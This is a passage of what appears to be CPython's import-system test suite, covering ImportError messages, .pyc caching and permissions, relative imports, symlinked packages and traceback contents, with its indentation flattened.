from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w', encoding='utf-8') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w', encoding='utf-8') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w", encoding='utf-8') as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w', encoding='utf-8') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w", encoding='utf-8') as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w", encoding='utf-8') as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w", encoding='utf-8') as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w", encoding='utf-8') as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w', encoding='utf-8') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
# bpo 38091: this is a hack to slow down the code that calls
# has_deadlock(); the logic was itself sometimes deadlocking.
def delay_has_deadlock(frame, event, arg):
if event == 'call' and frame.f_code.co_name == 'has_deadlock':
time.sleep(0.1)
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
sys.settrace(delay_has_deadlock)
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
sys.settrace(None)
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with threading_helper.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@unittest.skipUnless(sys.platform == "win32", "Windows-specific")
def test_dll_dependency_import(self):
from _winapi import GetModuleFileName
dllname = GetModuleFileName(sys.dllhandle)
pydname = importlib.util.find_spec("_sqlite3").origin
depname = os.path.join(
os.path.dirname(pydname),
"sqlite3{}.dll".format("_d" if "_d" in pydname else ""))
with os_helper.temp_dir() as tmp:
tmp2 = os.path.join(tmp, "DLLs")
os.mkdir(tmp2)
pyexe = os.path.join(tmp, os.path.basename(sys.executable))
shutil.copy(sys.executable, pyexe)
shutil.copy(dllname, tmp)
for f in glob.glob(os.path.join(glob.escape(sys.prefix), "vcruntime*.dll")):
shutil.copy(f, tmp)
shutil.copy(pydname, tmp2)
            env = {k.upper(): os.environ[k] for k in os.environ}
env["PYTHONPATH"] = tmp2 + ";" + os.path.dirname(os.__file__)
# Test 1: import with added DLL directory
subprocess.check_call([
pyexe, "-Sc", ";".join([
"import os",
"p = os.add_dll_directory({!r})".format(
os.path.dirname(depname)),
"import _sqlite3",
"p.close"
])],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
# Test 2: import with DLL adjacent to PYD
shutil.copy(depname, tmp2)
subprocess.check_call([pyexe, "-Sc", "import _sqlite3"],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w', encoding='utf-8') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w', encoding='utf-8') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
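# Hedged aside: the permission checks above reduce to stat.S_IMODE plus the
# umask. For example, with umask 0o022 a freshly created .pyc gets
# 0o666 & ~0o022 == 0o644 (rw-r--r--), which is what test_creation_mode
# asserts.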
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w", encoding='utf-8') as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = code.replace(co_consts=tuple(constants))
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'),
'w', encoding='utf-8') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_parentless_import_shadowed_by_global(self):
# Test as if this were done from the REPL where this error most commonly occurs (bpo-37409).
script_helper.assert_python_failure('-W', 'ignore', '-c',
"foo = 1; from . import foo")
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w', encoding='utf-8') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'wb'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'wb'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'wb'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'wb'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a', encoding='utf-8') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
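# Hedged aside: PEP 3147 maps a source file to tagged bytecode inside
# __pycache__; the exact tag varies by interpreter, e.g.:
#   importlib.util.cache_from_source("pkg/mod.py")
#   -> "pkg/__pycache__/mod.cpython-311.pyc"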
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
os_helper.rmtree(self.tagged)
os_helper.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(os_helper.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
os_helper.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(os_helper.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@os_helper.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
    Because of the peculiar needs of this function, the tests are
    deliberately whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
            _path_isfile.return_value = True
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
            _path_isfile.return_value = False
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w", encoding='utf-8') as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
